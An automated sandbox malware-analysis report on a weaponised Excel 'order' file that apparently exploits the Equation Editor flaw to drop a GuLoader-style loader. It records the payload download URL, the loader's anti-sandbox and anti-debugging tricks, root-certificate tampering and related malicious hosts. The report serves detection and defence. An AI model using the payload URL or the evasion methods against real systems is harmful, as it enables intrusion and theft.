Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: ORDER RFQ1009202.xlsx	Virustotal: Detection: 35%
Source: ORDER RFQ1009202.xlsx	ReversingLabs: Detection: 27%

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA

Jump to behavior

Source: C:\Users\Public\vbc.exe

Section loaded: C:\Windows\SysWOW64\msvbvm60.dll

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$ORDER RFQ1009202.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREDA8.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@6/21@1/2

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp

Binary or memory string: .VBPud<_

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Data Obfuscation:

Yara detected GuLoader

Show sources

Source: Yara match	File source: 00000006.00000002.618790028.0000000002350000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.688116507.00000000001B0000.00000040.00000001.sdmp, type: MEMORY

Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405002 push eax; iretd	6_2_00405004
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040201C push eax; ret	6_2_0040201D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00403A30 push ds; iretd	6_2_00403A3F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00404ADA push eax; iretd	6_2_00404ADC
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405A85 push ebx; iretd	6_2_00405A86
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004044A2 push ebx; iretd	6_2_004044A6
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401CAA pushad ; ret	6_2_00401CB8
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00404536 push FFFFFFD1h; ret	6_2_00404538
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00401FC6 pushad ; retf	6_2_00401FC7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00404DDE push eax; retf	6_2_00404DE0
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004039EA push ds; iretd	6_2_00403A3F
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004023FD push es; ret	6_2_004023FE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00402D8C push edx; retf	6_2_00402D8D
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0040219D push ebx; iretd	6_2_004021AE
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A406 push esp; ret	6_2_0235A407
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A402 push esp; ret	6_2_0235A403
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A40A push esp; ret	6_2_0235A40B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3F6 push esp; ret	6_2_0235A3F7
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3F2 push esp; ret	6_2_0235A3F3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3FE push esp; ret	6_2_0235A3FF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3FA push esp; ret	6_2_0235A3FB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3EE push esp; ret	6_2_0235A3EF
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3EA push esp; ret	6_2_0235A3EB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235A3C8 push esp; ret	6_2_0235A3E7
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001BA40A push esp; ret	9_2_001BA40B
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001BA402 push esp; ret	9_2_001BA403
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001BA406 push esp; ret	9_2_001BA407
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8E4C push eax; ret	9_2_001B8E4D
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B4CE7 pushad ; iretd	9_2_001B4CE8
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B8F9A push edx; ret	9_2_001B8FA1
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001BA3FA push esp; ret	9_2_001BA3FB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to detect Any.run

Show sources

Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\Qemu-ga\qemu-ga.exe			Jump to behavior
Source: C:\Users\Public\vbc.exe	File opened: C:\Program Files\qga\qga.exe			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Show sources

Source: vbc.exe, 00000006.00000002.618813971.0000000002360000.00000004.00000001.sdmp	Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: vbc.exe, 00000006.00000002.618813971.0000000002360000.00000004.00000001.sdmp	Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE

Tries to detect virtualization through RDTSC time measurements

Show sources

Source: C:\Users\Public\vbc.exe

RDTSC instruction interceptor: First address: 000000000040B9F2 second address: 000000000040B9F2 instructions: 0x00000000 rdtsc 0x00000002 cmp edi, 000000A5h 0x00000008 xor eax, edx 0x0000000a pand xmm2, xmm7 0x0000000e jmp 00007FF93438F201h 0x00000010 cmp ch, 0000003Bh 0x00000013 dec edi 0x00000014 cmp dx, 00E4h 0x00000019 cmp edi, 00000000h 0x0000001c jne 00007FF93438F126h 0x00000022 cmp di, 008Dh 0x00000027 mov ebx, 4E8EE3D3h 0x0000002c cmp bl, FFFFFFE1h 0x0000002f sub ebx, E7F2E312h 0x00000035 cmp ah, 00000049h 0x00000038 fabs 0x0000003a jmp 00007FF93438F200h 0x0000003c xor ebx, 8F76F07Eh 0x00000042 cmp edx, 4Fh 0x00000045 add ebx, 16550F41h 0x0000004b cmp si, 00E6h 0x00000050 cmp eax, 10h 0x00000053 rdtsc

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2904

Thread sleep time: -300000s >= -30000s

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 6_2_02358221 rdtsc

6_2_02358221

Source: C:\Users\Public\vbc.exe

System information queried: ModuleInformation

Jump to behavior

Source: vbc.exe, 00000006.00000002.618813971.0000000002360000.00000004.00000001.sdmp	Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: vbc.exe, 00000006.00000002.618813971.0000000002360000.00000004.00000001.sdmp	Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe

Anti Debugging:

Hides threads from debuggers

Show sources

Source: C:\Users\Public\vbc.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 6_2_02358221 rdtsc

6_2_02358221

Source: C:\Users\Public\vbc.exe	Code function: 6_2_02353AB9 mov eax, dword ptr fs:[00000030h]	6_2_02353AB9
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358A83 mov eax, dword ptr fs:[00000030h]	6_2_02358A83
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02352F36 mov eax, dword ptr fs:[00000030h]	6_2_02352F36
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02358B0B mov eax, dword ptr fs:[00000030h]	6_2_02358B0B
Source: C:\Users\Public\vbc.exe	Code function: 6_2_0235577C mov eax, dword ptr fs:[00000030h]	6_2_0235577C
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357759 mov eax, dword ptr fs:[00000030h]	6_2_02357759
Source: C:\Users\Public\vbc.exe	Code function: 6_2_02357DA9 mov eax, dword ptr fs:[00000030h]	6_2_02357DA9
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B2F32 mov eax, dword ptr fs:[00000030h]	9_2_001B2F32
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7759 mov eax, dword ptr fs:[00000030h]	9_2_001B7759
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B577C mov eax, dword ptr fs:[00000030h]	9_2_001B577C
Source: C:\Users\Public\vbc.exe	Code function: 9_2_001B7DA9 mov eax, dword ptr fs:[00000030h]	9_2_001B7DA9

Source: C:\Users\Public\vbc.exe

Process queried: DebugPort

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 6_2_023567FF LdrInitializeThunk,

6_2_023567FF

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior

Source: vbc.exe, 00000009.00000002.688204304.0000000000BC0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000009.00000002.688204304.0000000000BC0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000009.00000002.688204304.0000000000BC0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Stealing of Sensitive Information:

GuLoader behavior detected

Show sources

Source: Initial file

Signature Results: GuLoader behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Exploitation for Client Execution13	Path Interception	Process Injection12	Masquerading111	OS Credential Dumping	Query Registry1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel11	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Extra Window Memory Injection1	Modify Registry1	LSASS Memory	Security Software Discovery521	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Virtualization/Sandbox Evasion22	Security Account Manager	Virtualization/Sandbox Evasion22	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection12	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol123	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	Remote System Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Extra Window Memory Injection1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	System Information Discovery13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
ORDER RFQ1009202.xlsx	36%	Virustotal		Browse
ORDER RFQ1009202.xlsx	27%	ReversingLabs	Document-OLE.Exploit.CVE-2017-11882

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\vbc.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	51%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	28%	ReversingLabs	Win32.Trojan.Vebzenpak
C:\Users\Public\vbc.exe	28%	ReversingLabs	Win32.Trojan.Vebzenpak

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
ggle.io	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.icra.org/vocabulary/.	0%	URL Reputation	safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	0%	URL Reputation	safe
http://23.95.85.181/msn/vbc.exe	7%	Virustotal		Browse
http://23.95.85.181/msn/vbc.exe	100%	Avira URL Cloud	malware
https://ggle.io/4GZv	1%	Virustotal		Browse
https://ggle.io/4GZv	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ggle.io	151.101.65.195	true	false	1%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://23.95.85.181/msn/vbc.exe	true	7%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://ggle.io/4GZv	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check	vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	false		high
http://www.windows.com/pctv.	vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	false		high
http://investor.msn.com	vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	false		high
http://www.msnbc.com/news/ticker.txt	vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	false		high
http://www.icra.org/vocabulary/.	vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://windowsmedia.com/redir/services.asp?WMPFriendly=true	vbc.exe, 00000006.00000002.620050583.00000000033B7000.00000002.00020000.sdmp	false	URL Reputation: safe	unknown
http://www.hotmail.com/oe	vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	false		high
http://www.day.com/dam/1.0	91D8F771.emf.0.dr	false		high
http://investor.msn.com/	vbc.exe, 00000006.00000002.618930050.00000000031D0000.00000002.00020000.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
23.95.85.181	unknown	United States		36352	AS-COLOCROSSINGUS	true
151.101.65.195	ggle.io	United States		54113	FASTLYUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	483003
Start date:	14.09.2021
Start time:	12:15:59
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 39s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	ORDER RFQ1009202.xlsx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	2
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSX@6/21@1/2
EGA Information:	Failed
HDC Information:	Successful, ratio: 26.5% (good quality ratio 13.9%) Quality average: 32.5% Quality standard deviation: 38.2%
HCA Information:	Successful, ratio: 77% Number of executed functions: 57 Number of non-executed functions: 36
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, vga.dll, WMIADAP.exe, svchost.exe Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtQueryAttributesFile calls found.

Simulations

Behavior and APIs

Time	Type	Description
12:16:45	API Interceptor	74x Sleep call for process: EQNEDT32.EXE modified
12:17:57	API Interceptor	6x Sleep call for process: vbc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
151.101.65.195	CIh8xCD9fi.exe	Get hash	malicious	Browse	www.beenovus.com/sh2m/?o8bHpX=Vv1hBWZyhVMk+PL/u3xc97YTzZUk7YXVAyZFHG6rpHCWGHDNYKRmSvTI2xLN72Ol48Rf&RFQLz=3fQttPI8YNYDZ
	2089876578 87687.xlsx	Get hash	malicious	Browse	www.sarahpyle.xyz/xle/?-ZoXL=Sh1X2FVe5Axy65E7wsI7ENs8tKQyCAiIe/kznCIOtNfllRMns8OBiZ7gHtjBHXxR1fw3Qg==&qJE0=G0GpifmhvntLyZL
	M0uy4pgQzd.exe	Get hash	malicious	Browse	www.sarahpyle.xyz/xle/?9rq=Sh1X2FVb5Hx26pI3ysI7ENs8tKQyCAiIe/8j7BUPptfklgghrsfN0dDiELjHf2pZ5pEWJVhLUA==&4h0=vTR8SldxW2Clmhi
	Z4bamJ91oo.exe	Get hash	malicious	Browse	www.saraadamchak.com/jskg/?inKP_TF0=D3ZsiJO2yUZadAFwyrxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNTvhBS54Rsq&oneha=xPMpsZU8
	uqAU5Vneod.exe	Get hash	malicious	Browse	www.saraadamchak.com/jskg/?afcTJPQ8=D3ZsiJO2yUZadAFwyrxypI16Ov1mNCduO0wq0OOwpknW2PP1SKlK/fdwCNfWtg+5vXw7I6bISA==&cxoT9=yhvp2Xfp
	http://tracking.samsclub.com/track?type=click&enid=ZWFzPTEmYW1wO21zaWQ9MSZhbXA7YXVpZD0xNTYyMTMxNiZhbXA7bWFpbGluZ2lkPTYyMjA2JmFtcDttZXNzYWdlaWQ9MjYwMCZhbXA7ZGF0YWJhc2VpZD0xNTcxOTQxMzk5JmFtcDtzZXJpYWw9MTY3Nzk5MDgmYW1wO2VtYWlsaWQ9Y2JlbkBjb2xvcmNvYXRpbmMuY29tJmFtcDt1c2VyaWQ9MV8xODAyNiZhbXA7dGFyZ2V0aWQ9JmFtcDtmbD0mYW1wO212aWQ9JmFtcDtleHRyYT0mYW1wOyZhbXA7JmFtcDs=&&&16010&&&metging.web.app/chris.whippNovemberchris.whippchris.whipp#chris.whipp@paragon-europe.com	Get hash	malicious	Browse	metging.web.app/chris.whippNovemberchris.whippchris.whipp
	54188802.exe	Get hash	malicious	Browse	www.naciparaemprender.com/u4xn/?V2JP8=lhidFNnh32PlHZ5&ETmlgNZ=I4SxsSN01AV8LxEDjompoxYKaWnh9pIgkydI9MjqJKMC4C8OhqxVk2syPbNOadpjJdXL

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
ggle.io	kernel.exe	Get hash	malicious	Browse	151.101.1.195
	EXCHANGE RATE FOR EXTERNAL MONEY TRANSMITTERS - AMERICA - SEPTEMBER 06.xlsx	Get hash	malicious	Browse	151.101.65.195
	Swipt Copy.docx	Get hash	malicious	Browse	151.101.65.195
	Swipt Copy.docx	Get hash	malicious	Browse	151.101.1.195
	Payment Advice.docx	Get hash	malicious	Browse	151.101.1.195
	Payment Advice.docx	Get hash	malicious	Browse	151.101.1.195

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
AS-COLOCROSSINGUS	swift.xlsx	Get hash	malicious	Browse	198.46.199.171
	Additional Order Qty 197.xlsx	Get hash	malicious	Browse	198.12.107.117
	DHL Cargo Arrival.xlsx	Get hash	malicious	Browse	172.245.26.190
	Po2142021.xlsx	Get hash	malicious	Browse	198.12.107.117
	UPDATED SOA - JUNE & JUULY & AUGUST.xlsx	Get hash	malicious	Browse	192.3.146.254
	USD INV#1191189.xlsx	Get hash	malicious	Browse	192.3.146.254
	iRt5DdA7mx	Get hash	malicious	Browse	192.210.163.130
	RC9WOZiZEW	Get hash	malicious	Browse	192.210.163.130
	4m02nQfA9K	Get hash	malicious	Browse	192.210.163.130
	7tgTkWz2S7	Get hash	malicious	Browse	192.210.163.130
	eb13eEZ5Ca	Get hash	malicious	Browse	192.210.163.130
	1KJBt5Fkrl	Get hash	malicious	Browse	192.210.163.130
	pNPv5PPEYC	Get hash	malicious	Browse	192.210.163.130
	WeaLymsKwB	Get hash	malicious	Browse	192.210.163.130
	z1rB9IaC27	Get hash	malicious	Browse	192.210.163.130
	1MnN9Merm4	Get hash	malicious	Browse	192.210.163.130
	P823.xlsx	Get hash	malicious	Browse	192.3.13.11
	msn.xlsx	Get hash	malicious	Browse	23.95.13.175
	Transfer Swift.xlsx	Get hash	malicious	Browse	192.227.158.110
	PO-A5671.xlsx	Get hash	malicious	Browse	198.46.199.203
FASTLYUS	Quotation.jar	Get hash	malicious	Browse	199.232.192.209
	q5tuVZ7Ef1.dll	Get hash	malicious	Browse	151.101.1.44
	lKS018CkVe.dll	Get hash	malicious	Browse	151.101.1.44
	Quotation_562626263667.pdf.js	Get hash	malicious	Browse	199.232.192.209
	RemittanceADV835.htm	Get hash	malicious	Browse	151.101.1.145
	QUOTATION.exe	Get hash	malicious	Browse	151.101.192.119
	caDeEx.dll	Get hash	malicious	Browse	151.101.1.44
	exPlEx.dll	Get hash	malicious	Browse	151.101.1.44
	Bonus Bitcoin - 065540 .htm	Get hash	malicious	Browse	151.101.1.229
	plDeCa.dll	Get hash	malicious	Browse	151.101.1.44
	nextUsDe.dll	Get hash	malicious	Browse	151.101.1.44
	RFQ - R000001095.jar	Get hash	malicious	Browse	199.232.192.209
	Quotation.jar	Get hash	malicious	Browse	199.232.192.209
	RQF 1000281534.jar	Get hash	malicious	Browse	199.232.192.209
	currCurrPl.jpg.dll	Get hash	malicious	Browse	151.101.1.44
	c4DWctbDYR.dll	Get hash	malicious	Browse	151.101.1.44
	090921.dll	Get hash	malicious	Browse	151.101.1.44
	triage_dropped_file.dll	Get hash	malicious	Browse	151.101.1.44
	triage_dropped_file.dll	Get hash	malicious	Browse	151.101.1.44
	crNfx3f2H.dll	Get hash	malicious	Browse	151.101.1.44

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
7dcce5b76c8b17472d024758970a406b	Signature_Page.-639143_20210913.xlsb	Get hash	malicious	Browse	151.101.65.195
	5QjWQwEJrZ.xlsm	Get hash	malicious	Browse	151.101.65.195
	leakdetails.xlsx	Get hash	malicious	Browse	151.101.65.195
	Purchase Order_01.xlsx	Get hash	malicious	Browse	151.101.65.195
	Additional Order Qty 2.xlsx	Get hash	malicious	Browse	151.101.65.195
	DKHV-0330Q.xlsx	Get hash	malicious	Browse	151.101.65.195
	Document.xlsx	Get hash	malicious	Browse	151.101.65.195
	PS-AVP2-202098-96.docx	Get hash	malicious	Browse	151.101.65.195
	PL_AIR_CAKR21021409.xlsx	Get hash	malicious	Browse	151.101.65.195
	Report.xlsx	Get hash	malicious	Browse	151.101.65.195
	Order no.1480-G22-21202109.xlsx	Get hash	malicious	Browse	151.101.65.195
	SOA.xlsx	Get hash	malicious	Browse	151.101.65.195
